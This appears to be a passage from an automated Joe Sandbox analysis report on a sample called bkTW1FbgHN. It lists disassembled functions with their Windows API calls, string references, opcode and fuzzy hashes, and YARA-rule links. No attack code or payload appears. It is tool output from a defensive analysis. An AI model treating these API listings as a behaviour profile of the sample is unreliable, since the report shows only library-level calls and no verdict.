Instruction Fuzzy Hash: 93217F7064470AAFE7315F60EC88B373B69EF4A799F041114F285821A9CB7F9D44EB61

Function 00FFD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

CoInitialize.OLE32(00000000), ref: 00FFD5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FFD67D
SHGetDesktopFolder.SHELL32(?), ref: 00FFD691
CoCreateInstance.OLE32(01022D7C,00000000,00000001,01048C1C,?), ref: 00FFD6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FFD74C
CoTaskMemFree.OLE32(?,?), ref: 00FFD7A4
_memset.LIBCMT ref: 00FFD7E1
SHBrowseForFolderW.SHELL32(?), ref: 00FFD81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FFD840
CoTaskMemFree.OLE32(00000000), ref: 00FFD847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00FFD87E
CoUninitialize.OLE32(00000001,00000000), ref: 00FFD880

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: d8baf185d39e82e0c26f17d6eee79ee83d0f69c3a088fc8502d4e1594ba0125f
Instruction ID: 169a478ee169cd7a630e371d467de876688cc15c7caf9698b6a78dbf81d38f36
Opcode Fuzzy Hash: d8baf185d39e82e0c26f17d6eee79ee83d0f69c3a088fc8502d4e1594ba0125f
Instruction Fuzzy Hash: 25B11A75A00209AFDB04DFA8C888DAEBBB9FF48314F048459F909EB261DB34ED45DB50

Function 00FEC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00FEC283
GetWindowRect.USER32(00000000,?), ref: 00FEC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FEC2F3
GetDlgItem.USER32(?,00000002), ref: 00FEC2FE
GetWindowRect.USER32(00000000,?), ref: 00FEC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FEC364
GetDlgItem.USER32(?,000003E9), ref: 00FEC372
GetWindowRect.USER32(00000000,?), ref: 00FEC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FEC3C6
GetDlgItem.USER32(?,000003EA), ref: 00FEC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FEC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00FEC3FE

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 7d61141c51695465c4f07af38fea566dc85e0cf1e6ef7cf6287c8bf3f3375314
Instruction ID: f963b246a58c9e0ab35c3fec6fa366df5112e6305ff6628daa747d6aa2d595a6
Opcode Fuzzy Hash: 7d61141c51695465c4f07af38fea566dc85e0cf1e6ef7cf6287c8bf3f3375314
Instruction Fuzzy Hash: 27519071B00205AFDB18CFB9DD89AAEBBBAFB88310F14852DF605D7294DB749D048B50

Function 00F9201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00F91B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F92036,?,00000000,?,?,?,?,00F916CB,00000000,?), ref: 00F91B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F920D3
KillTimer.USER32(-00000001,?,?,?,?,00F916CB,00000000,?,?,00F91AE2,?,?), ref: 00F9216E
DestroyAcceleratorTable.USER32(00000000), ref: 00FCBCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F916CB,00000000,?,?,00F91AE2,?,?), ref: 00FCBCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F916CB,00000000,?,?,00F91AE2,?,?), ref: 00FCBCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F916CB,00000000,?,?,00F91AE2,?,?), ref: 00FCBD0A
DeleteObject.GDI32(00000000), ref: 00FCBD1C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: e7abfd2500aeaa7a6b233c616c20af8c5357fef46cf771a534648c9484e85a06
Instruction ID: b4343a7f9e41412d3af20f8a96818a5f77a0e0abaf6e12860ddfaa44d0421186
Opcode Fuzzy Hash: e7abfd2500aeaa7a6b233c616c20af8c5357fef46cf771a534648c9484e85a06
Instruction Fuzzy Hash: C061AE35900B02EFEB75DF14D94AB2AB7F1FF40322F50441CE5829A664C77AA895EF80

Function 00F921A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00F925DB: GetWindowLongW.USER32(?,000000EB), ref: 00F925EC

GetSysColor.USER32(0000000F), ref: 00F921D3

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: e73d97dea9455899b0148eb0119945145454d176405f048b693ea24b15b78a39
Instruction ID: b3d031e0765c9dff10ee2ca7631f970a3b2994d85553901c2cccc06a40750688
Opcode Fuzzy Hash: e73d97dea9455899b0148eb0119945145454d176405f048b693ea24b15b78a39
Instruction Fuzzy Hash: 8F41E431404141AFFF659F28EC89BB93B65EB06331F184255FEA58A1E5C7368C82EB21

Function 00FFA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0101F910), ref: 00FFA90B
GetDriveTypeW.KERNEL32(00000061,010489A0,00000061), ref: 00FFA9D5
_wcscpy.LIBCMT ref: 00FFA9FF

Strings

ramdisk, xrefs: 00FFA97F
cdrom, xrefs: 00FFA927
all, xrefs: 00FFA911
unknown, xrefs: 00FFA996
removable, xrefs: 00FFA93D
fixed, xrefs: 00FFA953
network, xrefs: 00FFA969

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: e69bbee563eb66317faa7bc9c0e6587da02cf2a6c6331869812e8da84602963a
Instruction ID: e318b01ec1ae4b7260020f1e931177a23e1be4f74868b58cf9edab9c8c578be6
Opcode Fuzzy Hash: e69bbee563eb66317faa7bc9c0e6587da02cf2a6c6331869812e8da84602963a
Instruction Fuzzy Hash: 2D51DEB1518305ABC710EF14CC92AAFB7A5FF84310F14482DF699572A2DB78DD09EA43

Function 00F99837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00F99862
__swprintf.LIBCMT ref: 00F998AC
__i64tow.LIBCMT ref: 00FCF5E6

Strings

%.15g, xrefs: 00F998A6
False, xrefs: 00FCF5AE
0x%p, xrefs: 00FCF5C8
True, xrefs: 00FCF5A7

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: d5ae0a3e89b0062c91e5b8eae6642e48d78834caf07374fdad71929cd205832c
Instruction ID: 06a4d527e0c766f9ed9330da1ce83a03927cbba0d297a9d54b4d865dd0c38d56
Opcode Fuzzy Hash: d5ae0a3e89b0062c91e5b8eae6642e48d78834caf07374fdad71929cd205832c
Instruction Fuzzy Hash: C9412972904206AFEF24DF39DD42FBAB3E9EF09310F24487EE549C7241EA759905AB10

Function 01017152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0101716A
CreateMenu.USER32 ref: 01017185
SetMenu.USER32(?,00000000), ref: 01017194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01017221
IsMenu.USER32(?), ref: 01017237
CreatePopupMenu.USER32 ref: 01017241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0101726E
DrawMenuBar.USER32 ref: 01017276

Strings

0, xrefs: 01017160
F, xrefs: 01017262

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 845fb95c03aeeecce417a9b7236f93a2f7c686e9214093b848f9878690631ac3
Instruction ID: b1f5e2206ebe35f75a91fd4eb975ad950bbc9f1ec66cac95ab2096961c95dff5
Opcode Fuzzy Hash: 845fb95c03aeeecce417a9b7236f93a2f7c686e9214093b848f9878690631ac3
Instruction Fuzzy Hash: 97413574A01209EFEB20DFA8D884EDA7BF5FF48310F140068FA85A7355D73AA914CB90

Function 010174BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0101755E
CreateCompatibleDC.GDI32(00000000), ref: 01017565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01017578
SelectObject.GDI32(00000000,00000000), ref: 01017580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0101758B
DeleteDC.GDI32(00000000), ref: 01017594
GetWindowLongW.USER32(?,000000EC), ref: 0101759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 010175B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 010175BE

Strings

static, xrefs: 010174F6

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: f2c929cfb3245c4616e08a7dcba1af85848327c9c62994091a488048d76d410a
Instruction ID: d8ffa57273da394989be400d68e632ca4ec7daa9a304dde6ba1815ad0ab85e07
Opcode Fuzzy Hash: f2c929cfb3245c4616e08a7dcba1af85848327c9c62994091a488048d76d410a
Instruction Fuzzy Hash: 9F316D32100216BBDF229F68DC08FDB3FA9FF09360F110214FA9596194CB7AD815DBA4

Function 00FB6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FB6E3E

Part of subcall function 00FB8B28: __getptd_noexit.LIBCMT ref: 00FB8B28

__gmtime64_s.LIBCMT ref: 00FB6ED7
__gmtime64_s.LIBCMT ref: 00FB6F0D
__gmtime64_s.LIBCMT ref: 00FB6F2A
__allrem.LIBCMT ref: 00FB6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB6F9C
__allrem.LIBCMT ref: 00FB6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB6FD1
__allrem.LIBCMT ref: 00FB6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB7006
__invoke_watson.LIBCMT ref: 00FB7077

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 40bffd88fb0f5c69b0cb46fbda0575584e771e784daa6486d87b85b52067aed2
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 8771F876E00717ABD714FE6ADC42BEAB7B8AF44364F14812EF514D6281E778D900AF90

Function 00FF2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF2542
GetMenuItemInfoW.USER32(01055890,000000FF,00000000,00000030), ref: 00FF25A3
SetMenuItemInfoW.USER32(01055890,00000004,00000000,00000030), ref: 00FF25D9
Sleep.KERNEL32(000001F4), ref: 00FF25EB
GetMenuItemCount.USER32(?), ref: 00FF262F
GetMenuItemID.USER32(?,00000000), ref: 00FF264B
GetMenuItemID.USER32(?,-00000001), ref: 00FF2675
GetMenuItemID.USER32(?,?), ref: 00FF26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FF2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF2735

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 6a804d8b3302f0323d4ef2132927fe1798f1226ff0e9b8a3f507329744f9ee42
Instruction ID: 1b343f9a436486fd8b14265180de62d188f7f64d556ecd83f020f78a0a4009d5
Opcode Fuzzy Hash: 6a804d8b3302f0323d4ef2132927fe1798f1226ff0e9b8a3f507329744f9ee42
Instruction Fuzzy Hash: 4A618F7190024DAFDB61DFA4DC88EBEBBB8EF05354F140059EA41A7261D73AAD05EB21

Function 01016F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01016FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01016FA8
GetWindowLongW.USER32(?,000000F0), ref: 01016FCC
_memset.LIBCMT ref: 01016FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01016FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01017067

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 45dac03c0cd201c2710ddb9ea5be92e44ec380354efbd2d2b7bf9190bb2bb211
Instruction ID: d9276d6acd52baed47d1eb9b394f52f9854db7e41944ffdd2fe0b593ffa70684
Opcode Fuzzy Hash: 45dac03c0cd201c2710ddb9ea5be92e44ec380354efbd2d2b7bf9190bb2bb211
Instruction Fuzzy Hash: C0617C75900208AFDB21DFA8CC81EEE77F9EF09710F100199FA55EB291C779A945CB90

Function 00FE6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FE6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00FE6C18
VariantInit.OLEAUT32(?), ref: 00FE6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00FE6C4A
VariantCopy.OLEAUT32(?,?), ref: 00FE6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00FE6CB1
VariantClear.OLEAUT32(?), ref: 00FE6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00FE6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FE6CDC
VariantClear.OLEAUT32(?), ref: 00FE6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FE6CF9

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 8c7bec63d8fae1299752bba1dacd31d6e0f3ec40b229fad86d4e9b2c82b37ea9
Instruction ID: 21eb4976947994490c40dea9cf06a37dbc7446e396155aeb32285b4203b8d3c7
Opcode Fuzzy Hash: 8c7bec63d8fae1299752bba1dacd31d6e0f3ec40b229fad86d4e9b2c82b37ea9
Instruction Fuzzy Hash: FA419131A0021E9FDF10DFA9D8449ADBBB9FF58350F008069F995E7251CB39A949DF90

Function 01005732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 01005793
inet_addr.WSOCK32(?,?,?), ref: 010057D8
gethostbyname.WSOCK32(?), ref: 010057E4
IcmpCreateFile.IPHLPAPI ref: 010057F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01005862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01005878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 010058ED
WSACleanup.WSOCK32 ref: 010058F3

Strings

Ping, xrefs: 01005816

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: ba3218d032a4d8ad76dab34c80bbf57e2e56cbd9281942a122c30f6095cd6773
Instruction ID: 1b3c8f9a36243699176c7d7044f3f0a4095162c2b22adfd83776bb1713e98c1e
Opcode Fuzzy Hash: ba3218d032a4d8ad76dab34c80bbf57e2e56cbd9281942a122c30f6095cd6773
Instruction Fuzzy Hash: 9B514D316042019FEB22DF29DC45B2A7BE4EF49720F044969F996EB2D1DB78E904DF42

Function 00FFB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FFB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FFB546
GetLastError.KERNEL32 ref: 00FFB550
SetErrorMode.KERNEL32(00000000,READY), ref: 00FFB5BD

Strings

NOTREADY, xrefs: 00FFB57C
READONLY, xrefs: 00FFB588
UNKNOWN, xrefs: 00FFB575
READY, xrefs: 00FFB596
INVALID, xrefs: 00FFB58F

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: abbd5c124e7bddb1532634c898b600ab9b65326438e4670f49dfe9795c6b98c4
Instruction ID: b32f539d730669359ed0cfa57f76840a2204d8dc895cd70c9e2a2c59291842fa
Opcode Fuzzy Hash: abbd5c124e7bddb1532634c898b600ab9b65326438e4670f49dfe9795c6b98c4
Instruction Fuzzy Hash: 2C31A075A002099FDB10EFA8C885ABD77B4EF05714F18802AE605DB2A5DB799A01EB80

Function 00FE8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00FEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FEAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FE9014
GetDlgCtrlID.USER32 ref: 00FE901F
GetParent.USER32 ref: 00FE903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00FE903E
GetDlgCtrlID.USER32(?), ref: 00FE9047
GetParent.USER32(?), ref: 00FE9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00FE9066

Strings

ListBox, xrefs: 00FE8FD1
ComboBox, xrefs: 00FE8F9C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
